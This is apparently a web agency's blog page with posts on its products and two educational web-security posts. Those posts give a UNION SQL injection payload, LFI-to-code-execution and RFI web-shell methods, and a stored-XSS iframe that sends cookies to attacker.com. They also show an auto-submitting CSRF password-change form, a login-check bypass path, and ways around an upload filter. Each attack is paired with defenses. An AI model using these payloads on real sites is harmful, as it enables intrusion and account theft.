Hello! We are MTR Design and site making is our speciality. We work with UK based startups, established businesses, media companies and creative individuals and turn their ideas into reality. This is a thrill and we totally love it.

Dizzyjam @ Music Hack Day

Author: Emil Filipov

If you had a slumberous February weekend, there is no reason to feel bad about it - after all, most of the world did. There was a special group of people, however, who gave up sleep and rest in favor of creating awesome applications that could change the way you and I experience music. Yes, I'm talking about the hackers that took part in the Music Hack Day event in San Francisco. read more ›

If you had a slumberous February weekend, there is no reason to feel bad about it - after all, most of the world did. There was a special group of people, however, who gave up sleep and rest, in favor of creating awesome applications that could change the way you and I experience music. Yes, I'm talking about the hackers that took part in the MusicHackDay event in San Francisco. These are the guys pushing the envelope, and these are the ideas you should watch out for, in case you have anything to do with the music industry.

The event produced 66 projects ranging from turning body outlines to soundwaves via a Kinect controller to a web platform for borrowing/renting musical instruments. It's an (yet) invisible creativity explosion - the sort of mini-nova that bursts into billions particles, giving birth to planets and star systems, millions of years later. Well, in the IT gravitational field a million of years pass just like one day, so we should expect the results quite soon! 

Thanks to the organizers, we were able to do an online presentation of the Dizzyjam website, and more specifically, of a new feature we've recently added - the Dizzyjam API. As you might expect, it s a web-based, RESTful API that enables you to access all Dizzyjam functions programmatically. It boasts a web console built into the docs, a WordPress plugin, bindings for Python and PHP, as well as a piece of unique functionality - creating new Dizzyjam users through your API account (see the manage/create_user method). The API got utilized by a very interesting project during the hackathlon - Merchr. It's the why-did-not-I-think-of-it-first kind of project - simple idea that could be a game changer one day. I sincerely hope that the guys behind this project will keep on hacking and bringing good stuff out!

Published in: Development, Projects

Get in business with Cotton Cart

Author: Milen Nedev

The new merchandising platform makes it possible for all of you to make money from your design. Show us your style! read more ›

Cotton Cart, our newest project, has just launched.

Some of you are probably already familiar with Dizzyjam - our e-commerce and merchandising platform which we created to make it easy and risk-free for anyone in the music industry to make money from their merchandise.

In the past we’ve received quite a lot of requests from people who wanted to use Dizzyjam for trading non-music stuff. And as those requests grew we started thinking about including a non-music section in the original website. Or creating an entirely new website for those who want to sell merchandise no matter what their business activity is. After short reflection we went for the second option and just before Christmas we did a soft launch of Cotton Cart.

The new site follows the overall idea of www.dizzyjam.com – in only three simple steps anyone can start making money - upload your designs, create your products and start selling. You don’t have to buy 100 blank t-shirts, to organize printing or pile up all the stuff you can’t sell. It won’t cost you a penny. But it will cost you creativity and popularity in order to make anyone besides your granny buy your stuff. Cotton Cart is here to solve the popularity issue.

Who can use this website?

Everyone. This may be a graffitist who wants to get famous, the grocery shop around the corner, where the best veggies are sold or a charity organisation that raises money for its cause. In fact such fundraising activities were the first to open their virtual stalls in Cotton Cart. Another clever idea is to use the platform for producing t-shirts or other merch for corporate events – team buildings, annual meetings and seminars. The website can be used for promoting sports events – just upload your local rugby team’s design, print your merch and sell them to your fans in the neighbourhood. Surely you will have an audience to remember the next time your team meets the rivals.

The possibilities are countless – your imagination is the limit. So far we have charity and fundraising groups, festivals, sports events and we can’t wait to see what else you can think of while using Cotton Cart.

Python and Django from dawn till dusk

Author: Emil Filipov

Want to learn Python and Django? Then this free seminar is just for you! Ninja training starts at the Telerik Academy in Sofia on Feb 3rd, 2013. read more ›

We've been invited to do another training session on Python and Django at the Telerik Academy. This time, it will be an intensive morning-to-evening seminar, with the aim of getting you from zero to hero on both Python and Django. Well, maybe not a true hero, but it will give you the basics of both technologies, so you can go on and study/work with them on your own. If you're in Sofia and getting into Python or Django has always been an unfulfilled childhood dream for you, or if you simply want to pick up some new and highly competitive skills for free, then waste not another minute - hurry to http://academy.telerik.com/seminars/python-and-django-development and reserve your seat!

Published in: Company News, Development

Server monitoring with S2Mon - Part 1

Author: Emil Filipov

We've all heard that servers sometimes break for one reason or another. We often forget, however, how inevitable it is. While everything is working, the system looks like a rock solid blend of software and hardware. You get the feeling that if you don't touch it, it would keep spinning for years. Well, that's a very misleading feeling. A lot of things can (and will!) go wrong, and you can be better prepared with a tool like S2mon.com. read more ›

We've all heard that servers sometimes break for one reason or another. We often forget, however, how inevitable it is. While everything is working, the system looks like a rock solid blend of software and hardware. You get the feeling that if you don't touch it, it would keep spinning for years.

That's a very misleading feeling. The proper operation of a server depends on many dynamic parts, like having Internet connectivity, stable power supply, proper cooling, enough network bandwidth, free disk space, running services, available CPU power, IO bandwidth, memory, ... That's just the tip of the iceberg, but I think the point is clear - there is a lot that can go wrong with a server. 

Eventually some of those subsystems will break down for one reason or another. When one of them fails, it usually brings down others, creating a digital mayhem that can be quite hard to untangle. Businesses relying on the servers being up and running tend not to look too favorably on the inevitability of the situation. Instead of accepting the incident philosophically and being grateful for the great uptime so far, business owners instead go for questions like "What happened?!?!!", "What's causing this???" and "WHEN WILL IT BE BACK UP????!!!". Sad, I know. 

Smart people, who would rather avoid coming unprepared for those questions, have come up with the idea of monitoring, so that:

  • problems are caught up in their infant stages, before they cause real damage (e.g. slowly increasing disk space usage);
  • when some malfunction does occur, they can cast a quick glance over the various monitoring gauges, and quickly determine what's the root cause of it;
  • they can follow trends in the server metrics, so they can both get insight into issues from the past and predict future behavior.

These are all extremely valuable benefits, and it's widely accepted that the importance of server monitoring is coming second only to the criticality of backups. Yet, there are more servers out there without proper monitoring that you would expect. The main reasons not so setup monitoring are all part of our human nature, and can be summed up to "what a hurdle to install and configure...", "the server is doing it's job anyway..." and my favorite "I'll do it...eventually".

I have some news for the Linux server administrators - you have an excuse no more. We've come up with a web monitoring system for your servers that is easy to setup, rich in functionality and completely free (at least for the time being). Go on and see a demo of it, if you don't believe me. If you decide to subscribe, it will take less than 1 minute. Adding a machine to be monitored basically boils down to downloading a Bash script and setting it up as a cron job (you'll get step-by-step instructions after you log in and add a new server record on the web). And if you want to integrate S2Mon into a custom workflow/interface of yours, there is API access to everything (in fact, the entire S2Mon website is one big API client).

Once you hook up your server to the system, you will unlock a plethora of detailed stats, presented in interactive charts like this one:

Apache children

What we see above is a pretty picture of the load falling on the Apache web server. Apparently we've had the same pattern repeating during the last week. That's a visual proof that the web server workload varies a lot throughout the day (nothing unexpected, but we can now actually measure it!).

OK, I now want to see how are my disk partitions faring, and when should I plan for adding disk space:

Disk Usage Stats

 Both partitions are steadily growing, but if the rate is kept, there should be enough space for the next 5-6 months.

Hey, you know what, I just got some complaints from a user that a server was slow yesterday, was there anything odd?

Load Average

Yep, most definitely. The load was pretty high throughout the entire afternoon. Believe it or not this time it was not his virus-infested Windows computer...

Your boss wants some insight on a specific network service, say IMAP? There you go:

IMAP - Connections per service

Wonder what your precious CPU spends its time on? See here:

CPU Stats

As you see, S2Mon can provide you with extremely detailed stats ready to be used anytime you need them. Of course, there is a lot more to it, and I'll cover more aspects of the setup, configuration and the work with S2Mon it in the next parts. As always, feedback is more than welcome!

Stayin' secure with Web Security Watch

Author: Emil Filipov

Is your server/website secure? How do you *really* know? Web Security Watch can help you with getting on top of the publicly-released security advisories. A custom security feed just for you - how cool is that? read more ›

Is your server/website secure? How do you really know? Let me get back to this in a while. 

As you may be aware there is a ton of security advisories released by multiple sources every day. That's a true wealth of valuable information flowing out on the Internet. Being aware of the issues described in these advisories could make all the difference between being safe and getting hacked; between spending a few minutes to patch up, and spending weeks recovering lost data, reputation and customer trust. So who would *not* take advantage of the public security advisories, right?

Not really. See, there is the problem of information overflow. There is really a lot of sources of security information, each of them spewing dozens of articles every given day. To make it worse, very few of those articles are really relevant to you. So, if you do want to track them, you end up manually reviewing 99% of junk to get to the 1% that is really relevant to your setup. A lot of system/security administrators are spending several dull hours every week to go through reports that rarely concern them. Some even hire a full-time dedicated operators to process the information. Others simply don't care about the advisories, because the review process is too time-consuming. 

Well, we decided we can help with the major pains of the advisory monitoring process. So we built Web Security Watch (WSW) for this purpose. This website aggregates security advisories coming from multiple reputable sources (so you don't miss anything), groups them together (so you don't get multiple copies), and tags them based on the affected products/applications. The last action is particularly important, as tags allow you to filter just the items that you are interested in, e.g. "WordPress", "MySQL","Apache". What's more, we wrote an RSS module for WordPress, so you can subscribe to an RSS feed which only contains the tags you care about. A custom security feed just for you - how cool is that? Oh, and in case you didn't notice - the site is great for security research. And it's free.

Even though WSW is quite young, it already contains more than 4500 advisories, and the number grows every day. We will continue to improve the site functionality and the tagging process, which is still a bit rough around the edges. If you have any feature requests or suggestions, we would be really happy to hear them - feel free to use the contact form to get in touch with us with anything on your mind.

Now, to return to my original question. You can't really tell if your site/server is secure until you see it from the eyes of a hacker. And that requires some capable penetration testers. Even after you had the perfect penetration test performed by the greatest hackers in the world, however, you may end up being hacked and defaced by a script kiddie on the next week, due to vulnerability that just got disclosed publicly.

Which gets me to the basic truth about staying secure - security is not a state, it's a process. A large part of that process is staying current with the available security information, and Web Security Watch can help you with that part.

PyLogWatch is born

Author: Emil Filipov

Introducing PyLogWatch - simple and flexible Python utility allowing you to capture custom log files into the centralized Sentry logging server read more ›

Here, at MTR Design, we are managing multiple web apps, servers and system components. All of them generate some kind of logs. Most of the time the logs are trivial and contain nothing that we should be concerned about. There is the odd case, however, where some log gets an entry that truly deserves our attention. You see, the signal-to-noise ratio in most logs is very low, so going over all of the logs by hand is an extremely boring and time-consuming task. Yet, there may be "gems" inside the logs that you really want to act on ASAP - say, someone successfully breaking into your server, or email list going crazy and spamming your customers.

So, what solutions do we have at our disposal? The most noteworthy are Splunk (hosted service, expensive) and Logstash (Java, pain to install, maintain and customize). I did not like any of them. What I did like was Sentry, which has a logging client (called Raven) available in dozen languages. The only problem is that Sentry is meant for handling exceptions coming from applications - not for general purpose logging. 

Yet, Sentry has a lot of the features that we do need:

  • Centralized logging with nice Web UI
  • Users, permissions, projects
  • Aggregation, so that similar log messages get grouped together
  • Quick filters, letting you hide message classes you do not care about
  • Plugin system that lets you write your own message processing 
  • Flexible and easy to use logging clients

Since we already had Sentry for handling in-app logging, enabling it to handle general-purpose server logs felt like a very compelling idea. So we did it...

Enter PyLogWatch

... by writing a Python app that parses log files and feeds them to Sentry. The application is very small and simple, and you can run it on any server with a recent version of Python. You don't need to be root, there is no long-running daemon, and no special deployment considerations - just download, configure, run (by cron, or via other means of scheduling). Of course, PyLogWatch relies on you having a Sentry server, but that's not too hard to install either (see the docs), and you can always use the very affordable hosted Sentry service (see the pricing), which features a limited free account.

The PyLogWatch project is still in its infant stages - there are just a couple of *very* basic parsers (for Apache error logs and for syslog files), and no extensions for the Sentry server yet. Nevertheless, it has already proven very useful to us, since it enabled our developers to closely track the Apache error log files for the applications they "own", and swiftly react to any problem that shows up. In practice, each error line generates a "ticket" in Sentry, and it sticks up there until a project member explicitly marks it as resolved. As an optional feature, all project members receive an email whenever there is a new entry waiting to be resolved. 

What I love about this project is that it is a pretty much blank sheet of paper. I believe that using the combined power of custom parsers and Sentry plugins can yield magnificent results.

So what tool are you using for log tracking? What would do you like/dislike about it, and what would you ideally like it to do? Feel free to share your thoughts.

Web Application Security Basics

Author: Dimitar Ivanov

With the development of the computers and the communication technologies, the question of the security is becoming more and more pressing. Nowadays, every individual has some kind of presence on the Internet. This is true to a much greater extent for the companies – you simply cannot do business if you do not use Internet and/or web-based solutions – ERP applications, collaboration tools, you name it. read more ›

Some History

With the development of the computers and the communication technologies, the question of the security is becoming more and more pressing. Nowadays, every individual has some kind of presence on the Internet. This is true to a much greater extent for the companies - you simply cannot do business if you do not use Internet and/or web-based solutions - ERP applications, collaboration tools, you name it. This is raising many questions, such as "How secure is the information of my company?"; "How secure is the information of my customers?"; "Can someone access this information without authorization?"; "What do I need to do to protect myself from getting hacked?", etc. These questions are more relevant today than they were in the past. Twenty years ago very few people used computers, and even fewer dealt with information security. For those that did, this was a hobby or a profession, and they had a different way of thinking - if they found a vulnerability in a software or a system, they would report it to the owners, so that they can fix or mitigate it. I remember in the 90's there was a guy that hacked the name server of our university network through the finger daemon, and report it it immediately without doing any harm. Now, when literally everyone has Internet access, things are quite different. Anyone can download working exploits for recently published vulnerabilities; there are tools that can automate most of the tasks you would go through to hack a website; and do not forget Google and Shodan, which you can use to find vulnerable targets. This is making "hacking" (if you can call it that) very easy.

Why the Web Application security matters?

Under these circumstances, it is not hard to answer this question. Since virtually anyone has access to "hacking resources", the threat to the information security has increased enormously. With the migration to the Web applications, combined with the whole fuzz around the cloud computing, the focus of the security specialists and researchers has shifted. On one hand, it is harder to find a remote exploit for the operating systems. On the other hand, it is much easier to target and compromise a Web application. Often, the only thing you need to do that is a Web browser - take the LFI, RFI, File Upload, SQLi. If the application is vulnerable to LFI, you can include the process environment, which is going to be parsed by the PHP interpreter. If you change the User-Agent to a PHP code, it will be executed, giving you a remote command execution. If there is an RFI, you can include a Web shell from a remote server, and so on. Additionally, the vulnerabilities are announced publicly, sometimes even before there is a patch for them. Yeah, but

why on earth would someone attack my company?

Well, the motivation of the hacker can be different - industrial espionage; getting a stepping stone (hopping station) for carrying out attacks on other machines/networks; real or imaginary profit; revenge, hacktivism, etc. Anyone can target any company even for no particular reason, so

what could be the damage?

No matter the motivation of the attacker, their actions can cause huge financial losses, loss of reputation and trust, law suits. If a server is hacked and used as a hopping station to target other networks, it may be confiscated by the law enforcement, which can lead to additional losses. If its content is deleted, this can directly affect the productivity. A compromise of a server can lead to attacks on the internal networks of the company. That is why, we need to know what are

the Most Common Vulnerabilities in the Web Applications

The Open Web Application Security Project (OWASP) defines ten categories, which combine "the most serious risks for a broad array of organizations." Below, we will outline some of the most common vulnerabilities we have met in the course of our work. Probably the most common and the easiest one to exploit is

SQL Injection - Exploiting the Developer

Almost every dynamic Web application uses some kind of database backend. The content displayed to the application users is stored in the database and displayed in the browser, depending on the parameters passed by the underlying scripts to the backend. These parameter, however, depend on the user behavior, and can, therefore, be modified by them. This is the basic functionality of the Web application. The problems arise when the parameters are passed to the database without any sanitizing. This allows malicious users to close the legitimate query and pass their own queries to the database and get the results one way or another. In other words, SQL Injection exploit the assumptions, made by the application developers. For example, when the developer produced the following code:

$sql = '
FROM products
WHERE id = ' . $_GET['id'];

they wanted the script to query the database for products matching a given ID that is passed as a GET parameter. That is, if the visitors access http://target.com//vulnerable_script.php?id=1, they would see the details for the product with ID 1. The database query will look like this:

FROM products
WHERE id = 1

In this particular case, the developers assumed that the 'id' parameter would always be an integer. However, since the value of the 'id' parameter is passed to the database by the user without any filtering, a malicious user can input the following URL in the browser: http://target.com//vulnerable_script.php? id=1+union+select+0,1,concat_ws(user(),0x3a,database(),0x3a,version()),3,4,5,6-- In this case, the DB query will look like this:

FROM products
WHERE id = 1
union all
select 0,1,concat_ws(user(),0x3A,database(),0x3A,version()),3,4,5,6

Basically, this tells the database to display the information about the product with ID 1 and combine it with a set of data that contains the information about the user, the name of the database and the version of the database server. This information is selected in the third column, separated by colons (0x3A). To make this query, the attacker needs to know the number of the columns in the database. This information can be easily obtained by several requests that instruct the database to display the data, ordered by a particular column. This is a basic example for a regular Union SQL Injection. There are other flavors of SQLi - error-based, time-based blind boolean-based blind. Error-based SQL Injection attacks rely on extracting information from the errors, returned by the database. There is a nice introductory tutorial on error-based SQLi on Youtube. Surprisingly often, developers think that when they hide the errors from the output, they have resolved the vulnerability. Of course, this is not the case - the fact that you cannot see the data, returned by the database (union-based) or the errors (error-based), does not mean that the script is not vulnerable. In these cases, an attacker can use Blind SQL Injection to exfiltrate data, i.e. brute-force the data, based on boolean or time-based conditions. In these cases, you will pass queries that will inspect the responses of the database server and reconstruct the data. Of course, the attackers and pentesters are not stuck with the browser to exploit these vulnerabilities. There are numerous tools that will automate the process. The best one is sqlmap. Bernardo and Miroslav have done amazing job developing this tool. There are several things that can be done to prevent SQL Injection. The most widely used method is

filtering the user input

This method is the easiest to implement and if not implemented properly, it can be bypassed. There are numerous techniques to bypass defenses, based on input filtering - case tampering, white space tampering, encoding the queries. A lot better defense against SQLi is to use

parameterized queries

or "prepared statements". These are essentially templates for SQL queries, which contain spaces where the user input will go. When the filled-in template is passed to the database, the entire user input would be in the space allocated for it in the template. The database will execute the query from the template, instead of the query that may be supplied in the user input. Alternatively, developers can use

ORM (Object Relational Mapping)

This is a technique for object conversion, which converts the tables in the database to scalar variables, creating a virtual database. In practice, the ORM systems generate parameterized queries. The second most common vulnerability in Web applications is

File Inclusion - Exploiting the Functionality

This is another vulnerability that is fairly easy to find and exploit. Essentially, this is the ability to include files from the machine on which the application runs, or from a remote server, visible to this machine. The possibility to include different scripts is essential for the work of every application - this is how the application logic is abstracted or how different pages are displayed, depending on the user choice. Let's take a fairly simple website that has four pages: Home, News, About Us, Contacts. If the visitor accesses the Home page, the URL they will use would look like that:


In other words, the script accepts one parameter (page), which value specifies the page that is requested by the visitor. Let's assume that the script has the following code:

$page = $_GET['page'];
if(isset($page)) {
else {

The code is self-explanatory - the value of the GET parameter page is assigned to a variable 'page'. If its value is not NULL, the script includes the script with a name that is the same as the value. The problem with this code is that the page variable is created from the user input without any checks or filtering. Therefore, if we access the following URL:


the script will include and display the contents of the UNIX password file. This is a very simplified example of LFI. Often, programmers think that to secure the script above, they only need to add one little modification:

$page = $_GET['page'];
if(isset($page)) {
include("$page" . ".html");
else {

The only difference here is that a .html extension is added to the page that is included. However, by simply appending a null character (%00) to the URL, the attacker would still be able to include arbitrary files. This depends on the server configuration, the PHP version and may not work in all cases. In other cases, the developers use the file_exists() function, but this is functionality check, not a security one, because it does not limit the ability to include existing files. LFI vulnerabilities can easily lead to command execution in some cases. To achieve this, a malicious user can use the /proc file system, which is used in Linux as an interface to the kernel of the Operating System. Let's say that, again, we have a script that is vulnerable to LFI. To gain the ability to execute commands on the server, a malicious user can include /proc/self/environ. This is the environment of the current process - it contains the environmental variables for the running process. Besides the system environmental variables, it also contains the CGI variables (REMOTE_ADDR, HTTP_REFERER, HTTP_USER_AGENT, etc.) So, if the hacker changes the User-Agent header, passed to the server to a PHP script, the script will be parsed by the PHP interpreter and executed on the server. So far, we've looked into the ability to include files locally from the server, on which the vulnerable script is running. To include files from remote locations is not that different. Actually, if the server configuration allows the inclusion of remote scripts, and if the script is vulnerable, the only difference will be in the URL - the attacker would just have to use an address, such as


The file php_shell.txt will be included by the vulnerable script and parsed by the interpreter and executed locally on the server, effectively giving the attacker web shell access to the machine. Much like the SQL Injection vulnerabilities, the File Inclusion vulnerabilities are fairly easy to find and exploit. They are too a result of bad programming. Another such result is the

Arbitrary File Upload or Exploiting the Hostpitality

We have previously posted about these type of vulnerabilities, so we are going to skip this one here. The truth is that it is not just media upload forms that can be exploited. Any file upload script can be used. There may not even be an HTML form; the attackers can just make a request to the script. Even if we have a secure application, we should always be watching for

Unprotected Files or Exploiting the Negligence

People often make mistakes because of negligence. Developers and/or system administrators are not an exception to this rule. With the correct Google dorks we can find numerous configuration or backup files with database connect strings, scripts with improper content type that would be downloaded instead of executed in the browser, file managers with poor or no authentication, and so on. It may sound weird, but this is a fairly common mistake. Imagine that the developer of a web application has to make a quick change on the production server. They create a backup of the script that are about to change, and then leave the backup file with a .bak extension on the server. Even if the script does not contain sensitive data, such as usernames and passwords, it will still represent a security issue, because the backup file will most probably be downloaded by whoever accesses it. In another scenario, the Web application may use a Rich Text Editor, such as FCKEditor. There are lots of vulnerable versions of such editors that allow unauthenticated users to upload arbitrary files. The main reason for this security hole is the fact that people place files where they are not supposed to. To avoid this, you need to make sure that all files that should not be accessible over HTTP be placed outside the Web root directory. If for some reason this is not possible, these files should be protected properly. Probably the most common and overlooked vulnerability is

XSS or Exploiting the User

There are situations, in which the Web application allows us to get to the server through the user. The XSS (Cross-Site Scripting) vulnerabilities allow the attacker to inject custom scripts, which are executed in the context of the browser of the webapp user. This is due to improper validation of the output. There are two kinds of XSS vulnerabilities: persistent (stored) and non-peristent (reflected). Persistent XSS attacks store the injected code on the server and it is executed each time the page is displayed to the visitors. Here is an example scenario that uses stored XSS to get the cookie of the Web application user.

  • The attacker creates a script on their server that will collect the cookies.
  • The attacker injects the following hidden iframe in the application:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location=”attacker.com/get_cookies.php?cookie=” + document.cookie)></iframe>
  • An authenticated user loads the page that contains the iframe.
  • The cookie is sent to the script, which writes it to a file or a database.
  • The attacker loads the cookie in their browser and is able to authenticate as the user.

Non-persistent XSS attacks are essentially the same; the only difference is that the injected code is not stored on the server. Instead, the attacker needs to trick the user to follow a link. Although XSS attacks usually attempt to steal cookies, this is not always the case. They may be used to target the passwords saved in the browser, and let's not forget BeEF. This means that setting the HttpOnly flag is not enough to protect the Web application users from XSS attacks. The best protection will be to validate and sanitizing the input and the output of the application alongside with tightened cookie security policies. A close relative of the XSS is the

XSRF or Exploiting the Browser

In its essence, the Cross-Site Request Forgery (CSRF or XSRF) attack is a hybrid between an XSS and a LFI attack. XSRF attacks are a way to issue commands from a user that the Web application trusts. Suppose we have a page in our Web application where the users can change their passwords. If the form is vulnerable to XSRF, the attacker can exploit this vulnerability to reset the password of the user. Here is how such an attack will take place:

  • The attacker creates their own form on their server:
    <body onLoad="javascript:document.password_form.submit()">
        <form action="https://target.com/admin/admin.php?" method=post name="password_form">
            <input type=hidden name=a value=change_password>
            <input type=password name=password1 VALUE="new_pass">
            <input type=password name=password2 VALUE="new_pass">
  • The attacker creates a seemingly empty HTML page, which contains a hidden iframe or an img tag that loads the form.
  • The attacker tricks the user to access the page (the user has to have an active session with the Web application).
  • The form submits the data to the server, effectively changing the password.

The only difficult thing in the attack is to trick the user to visit the page, while being logged in the application. This may be achieved with a spoofed e-mail, instant message, and so on. To protect users against such attacks, developers need to use anti-XSRF tokens in POST requests. Additionally, user actions, such as changing their passwords, should require an additional confirmation, usually, the users should enter the old passwords. Both CSS and CSRF attacks attempt to steal user accounts. This can also be achieved via attacking the

Authentication and Authorization or Exploiting the Implementation

We all know that assumptions are bad, but we still continue to assume. Fairly often the developers of the application make assumptions on how the authorization and the authentication of the users should work. These assumptions are sometimes wrong, and malicious users can conduct actions that do not always match whatever the developers have taken for granted. Let's take one of the most famous shopping cart scripts for an example. Here is how the administrators of the application log in to the administrative interface.

  • The administrator accesses http://target.com/catalog/admin.
  • The script redirects to the login.php script.
  • The administrator enters their login credentials.
  • The script checks the login credentials.
  • If they are correct, the administrator is logged in.
  • If they are not correct, the script asks the user for their login credentials again.

This is achieved by showing the login.php script to every unauthenticated user of the appl
ication. Let's see part of the code of the script. The login.php script contains the following code:


and here is the part of the application_top.php script that checks if the user is authenticated:

// redirect to login page if administrator is not yet logged in 
if (!tep_session_is_registered('admin')) { 
$redirect = false; 
$current_page = bassename($PHP_SELF); 
if ($current_page != FILENAME_LOGIN) { 
if (!tep_session_is_registered('redirect_origin')) { 
$redirect_origin = array('page' => $current_page, 'get' => $HTTP_GET_VARS); 
$redirect = true; 
if ($redirect == true) { 

What it basically does is check if the basename of $PHP_SELF is login.php. If it is login.php, then it serves the page; otherwise you will be redirected to login.php. Now, imaging that the attackers accesses the following URL:


The basename of $PHP_SELF is login.php, so the redirect is completely bypassed and the script renders the page, which, is of course, file_manager.php.

The attacker can also make a POST request to http://target.com/catalog/admin/administrators.php/login.php?action=insert and add themselves as a site administrator, upload a Web shell, and so on, and so forth.

Such vulnerabilities are due to mistakes in the programming. They are a bit harder to detect by the attackers, but they are extremely unpleasant, as they give access to the application to unauthenticated users.

To avoid these vulnerabilities, the logic of the application has to be very well planned, and the the implementation should be thoroughly tested.

Of course, there are other vulnerabilities , and attacks that are hybrids of the attacks described above. There is no post that can encompass them all. But we can safely say that these are the most common vulnerabilities and attacks on the Internet nowadays.

In a follow-up post we will discuss the defense and the penetration tests as part of the defense.

This article is translated to Serbo-Croatian language by Anja Skrba from Webhostinggeeks.com.

Published in: Development, Security

Another way to make a difference

Author: Emil Filipov

Here at MTR we try to make a difference every day, by challenging stereotypes and finding creative ways to deal with our tasks. This month, however, I will try to make a difference in another way - by doing some teaching. read more ›

Here at MTR we try to make a difference every day, by challenging stereotypes and finding creative ways to deal with our tasks. This month, however, I will try to make a difference in another way - by doing some teaching. A Django Crash Course (in Bulgarian) will take place on Aug 31st, in the headquarters of the initLab hackerspace in Sofia. I've been thinking about this for a while, since Django is basically unknown around here, and I finally found the time to do a little (pr|t)eaching. The plan is to cover the following topics:

1. Installing Python on Windows

2. Introduction to the Python interactive console and demonstrating basic Python constructs/syntax

3. Installing Django on Windows and playing with PYTHONPATH  + startproject

4. Installing Django on Linux; playing with runserver

5. Django Tutorial Part 1 

  • Folder structure
  • Running the development server
  • Database setup
  • Models/ORM
  • Playing with the models from the command line

6. Django Tutorial Part 2

  • Activating the Admin App
  • Adding our models to the Admin
  • Customizing the ModelAdmin

7. Django Tutorial Part 3

  • Routing addresses with the URL dispatcher
  • Writing views and rendering templates
  • Using template constructs
  • Named URLs and URL reversal in code/templates
  • Template resolution
  • Overriding Admin templates
  • Dealing with static media

8. Django Tutorial Part 4

  • Working with basic forms
  • Showcasing ModelForms
  • ModelForm security considerations

9. Making your life easy with Django Debug Toolbar

So there you have it - a Python fanboy trying to convince developers that they deserve better than PHP, during a 4-hour Django intro full of hate, love and ponies. The course is completely free, so do come by if you're in the mood for some webdev action!

Published in: Company News, Development
Tags: ,

Poking with Media Upload Forms

Author: Dimitar Ivanov

Every pentester loves file upload forms - the ability to upload data on the server you are testing is what you always aim for. During a recent penetration test, I had quite the fun with a form that was supposed to allow registered users of the site to upload pictures and videos in their profiles. read more ›

What can I say about file upload forms? Every pentester simply loves them - the ability to upload data on the server you are testing is what you always aim for. During a recent penetration test, I had quite the fun with this form that was supposed to allow registered users of the site to upload pictures and videos in their profiles. The idea behind the test was to report everything as it was found, and the developers would fix it on the fly. The usual SQL injection and XSS issues they had no problems with, but the image upload turned to be a real challenge. When I got to the file upload form, it performed no checks whatsoever. I tried to upload a PHP shell, and a second later I was doing the happy hacker dance.

The challenge

So the developers applied the following fix:

$valid = false; if(preg_match('/^image/', $_FILES['file']['type'])) { $info = getimagesize($_FILES['file']['tmp_name']); if(!empty($info)) $valid = true; } elseif(preg_match('/^video/', $_FILES['file']['type'])) { $valid = true; } else { @unlink($_FILES['file']['tmp_name']); }
if($valid) { move_uploaded_file( $_FILES['file']['tmp_name'], 'images'.'/'.$_FILES['file']['name'] );

The code is now checking the type of the file and size of the images. However, there are a few issues with this check:

  • the type of the file is checked via the Content-Type header, which is passed to the script by the client, and therefore, can be easily modified;
  • the script is not checking the file extension, and you can still upload a .php file;
  • the check for the videos is only based on the Content-Type header.


It is fairly easy to evade this kind of protection of file upload forms. The easiest thing, of course, is to upload a PHP script, by changing the Content-Type header of the HTTP request to image/video. To do this, you need to intercept the outgoing HTTP request with a local proxy, such as Burp or Webscarab, but Tamper Data for Firefox will do just fine. You can also upload a valid image and insert PHP code in the EXIF. To do this, you can insert the code in the Comments field, e.g.:

$ exiftool -Comment='' info.php 1 image files updated

When you upload the image with a .php extension, it will be interpreted by the PHP interpreter, and the code will be executed on the server. Depending on the server configuration, you might be able to upload the image with .php.jpg extension. If the check for the extension is not done correctly, and if the server configuration allows it, you can still get code execution. Easy, eh?


So what can be done to prevent this? With a mixture of secure coding a some server-side tweaks, you can achieve a pretty secure file upload functionality.

  • [Code] Check for the Content-Type header. This may fool some script kiddies or less-determined attackers.
  • [Code] Check for the file extension. Replace .php, .py, etc. with, say, _php, _py, etc.
  • [Server] Disable script execution in the upload directory. Even if a script is uploaded, the web server will not execute it.
  • [Server] Disable HTTP access to the upload directory, that is if the files are only meant to be accessible only from scripts using the file system.Otherwise,  although the script will not be executed locally on the server, it could still be used by attackers in Remote File Inclusion attacks. If they target another server with an application that has an RFI vulnerability and allow_url_include is on, they can upload a script on your server and use it to get a shell on the vulnerable machine.


Developers often forget that relying on client-side controls is a bad thing. They should always code under the assumption that the application may be (ab)used by malicious user. Everything on the client side can be controlled and therefore, evaded. The more you check the user input, the better. And of course, the server configuration should be as hardened as possible.